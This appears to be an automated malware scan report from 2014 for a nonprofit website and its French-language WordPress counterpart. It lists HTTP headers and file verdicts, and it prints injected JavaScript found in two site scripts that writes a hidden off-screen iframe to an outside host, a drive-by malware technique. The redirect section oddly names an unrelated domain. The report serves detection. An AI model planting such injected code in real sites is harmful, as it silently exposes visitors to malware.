Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=growingwithoutborders.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: campobasso-imprese.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: campobasso-imprese.it
Referer: http://www.google.com/search?q=campobasso-imprese.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://growingwithoutborders.org/ | HTTP/1.1 302 Found Cache-Control: max-age=3600 Connection: close Date: Wed, 17 Sep 2014 21:03:26 GMT Accept-Ranges: bytes Age: 0 Location: http://growingwithoutborders.org/index.html Server: Apache/2 Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 Expires: Wed, 17 Sep 2014 22:03:26 GMT | clean |
http://growingwithoutborders.org/index.html | HTTP/1.1 200 OK Cache-Control: max-age=3600 Connection: close Date: Wed, 17 Sep 2014 21:03:26 GMT Accept-Ranges: bytes Age: 0 ETag: "6e-4a8625d4be32c" Server: Apache/2 Content-Length: 110 Content-Type: text/html Expires: Wed, 17 Sep 2014 22:03:26 GMT Last-Modified: Tue, 19 Jul 2011 01:52:12 GMT | malicious |
http://www.grandirsansfrontieres.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 17 Sep 2014 21:03:28 GMT Pragma: no-cache Location: http://grandirsansfrontieres.org/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=565a710beb1a6b8667ea89ee20c9cf6f; path=/ Set-Cookie: SimpleEcommCartSID=RNNME6BG4B62JKXS2FFVPV5TY38Y2A8O6N14T4IJ; path=/ X-Pingback: http://grandirsansfrontieres.org/xmlrpc.php X-Powered-By: PHP/5.4.31 | clean |
http://grandirsansfrontieres.org/ | 200 OK Content-Length: 27655 Content-Type: text/html | clean |
http://grandirsansfrontieres.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97455 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8253 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://bubneriod.ryko89.com/brubigaler16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border-
Antivirus reports:
http://grandirsansfrontieres.org/wp-content/plugins/easy-social-icons/js/cnss.js?ver=1.0 | 200 OK Content-Length: 1342 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/plugins/sz-video/players/flowplayer/flowplayer.min.js?ver=5.4.3 | 200 OK Content-Length: 35246 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/plugins/simple-e-commerce-shopping-cart/js/simpleecommcart-library.js?ver=1.0.0 | 200 OK Content-Length: 1810 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/prettyphoto.js | 200 OK Content-Length: 23424 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/easing.js | 200 OK Content-Length: 7512 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/parallax.js | 200 OK Content-Length: 6974 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/bxslider.js | 200 OK Content-Length: 20176 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/cookie.js | 200 OK Content-Length: 2892 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/respond.js | 200 OK Content-Length: 4268 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/retina.js | 200 OK Content-Length: 2379 Content-Type: application/javascript | clean |
http://grandirsansfrontieres.org/wp-content/themes/wpaid/scripts/custom.js | 200 OK Content-Length: 5425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined}function HomeMader(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("Windows")<+1;var n=getCookie("lastshow")===undefined;if(!t&&n){document.write('<iframe src="http://bubneriod.ryko89.com/brubigaler16.html" style="left: -999px;position: absolute;border-color: hsl(120,100%,75%);border- menuContainer.css('backgroundColor', '#9e0909'); sliderBorder.css('borderColor','#9e0909'); colorSelectors.css('color','#9e0909'); return false; }); jQuery('.darkOption a').css({color:"#363636"}).click(function () { menuContainer.css('backgroundColor', '#363636'); sliderBorder.css('borderColor','#363636'); colorSelectors.css('color','#363636'); return false; }); }
Antivirus reports:
http://grandirsansfrontieres.org/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 5342 Content-Type: application/javascript | clean |